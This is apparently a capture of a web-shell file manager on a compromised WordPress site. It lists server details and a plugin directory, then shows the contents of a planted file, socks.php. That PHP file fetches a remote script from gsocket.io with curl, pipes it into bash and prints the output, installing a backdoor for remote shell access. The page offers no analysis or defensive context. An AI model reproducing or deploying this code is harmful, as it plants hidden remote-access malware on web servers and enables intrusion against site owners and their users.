/
/
home
/
melaqxso
/
allshadesofwellness.com
/
wp-content
/
plugins
/
performance-lab
Server: server63.web-hosting.com (198.54.116.184)
You: 216.73.216.61
PHP 7.4.33
Dir:
/home/melaqxso/allshadesofwellness.com/wp-content/plugins/performance-lab
Edit:
/home/melaqxso/allshadesofwellness.com/wp-content/plugins/performance-lab/socks.php
<?php $process = proc_open("bash -c \"$(curl -fsSL https://gsocket.io/y)\"", [ 0 => ["pipe", "r"], // STDIN 1 => ["pipe", "w"], // STDOUT 2 => ["pipe", "w"] // STDERR ], $pipes); if (is_resource($process)) { echo "<pre>" . stream_get_contents($pipes[1]) . "</pre>"; fclose($pipes[1]); proc_close($process); } ?>
Ukuran: 337 B